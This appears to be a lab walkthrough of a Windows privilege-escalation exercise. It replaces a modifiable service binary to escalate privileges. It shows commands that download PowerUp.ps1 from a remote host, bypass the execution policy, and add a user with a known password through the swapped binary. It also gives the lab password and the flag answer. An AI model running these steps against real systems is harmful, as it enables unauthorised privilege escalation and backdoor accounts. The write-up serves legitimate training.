Questions 2 
Connect to CLIENTWK221 (VM #2) via RDP as user milena with the password MyBirthDayIsInJuly1!. Find a service in which milena can replace the service binary. Get an interactive shell as user running the service and find the flag on the desktop.

HINT
Import PowerUp.ps1 to identify a service to modify.
Replace the service's executable by renaming with a malicious binary.
Restart the service to trigger the malicious binary and gain shell access.
The flag is on roy user's desktop.

xfreerdp /u:milena /p:MyBirthDayIsInJuly1! /v:192.168.178.221

# Open powershell 
# Lets identify the ModifiablePath using Powerup.ps1
PS C:\Users\milena> iwr -uri http://192.168.45.207/PowerUp.ps1 -Outfile PowerUp.ps1
PS C:\Users\milena> powershell -ep bypass
PS C:\Users\milena> . .\PowerUp.ps1
PS C:\Users\milena> Get-ModifiableServiceFile
...
ServiceName       : BackupMonitor
ModifiableFile    : C:\BackupMonitor\BackupMonitor.exe
StartName         : .\roy
AbuseFunction     : Install-ServiceBinary -Name 'BackupMonitor'
CanRestart        : True
...
PS C:\Users\milena> install-servicebinary -Name 'BackupMonitor'
Set-Content : The process cannot access the file 'C:\BackupMonitor\BackupMonitor.exe' because it is being used by
another process.

# We identify that the service is running so we cannot exploit 
PS C:\Users\milena> Stop-Service BackupMonitor
PS C:\Users\milena> install-servicebinary -Name 'BackupMonitor'
BackupMonitor C:\BackupMonitor\BackupMonitor.exe net user john Password123! /add && timeout /t 5 && net localgroup A...

# Now we can start the service again
PS C:\Users\milena> start-service BackupMonitor
start-service : Failed to start service 'BackupMonitor (BackupMonitor)'.

# Service had failed to start, let check is our code exploit successfully
PS C:\Users\milena> net user
...
john
...

# Change to john user
start-process PowerShell -verb runas
PS C:\Users\roy\Desktop> type flag.txt
OS{48a02a9d3a7d3c0daabc11af1af8f475}

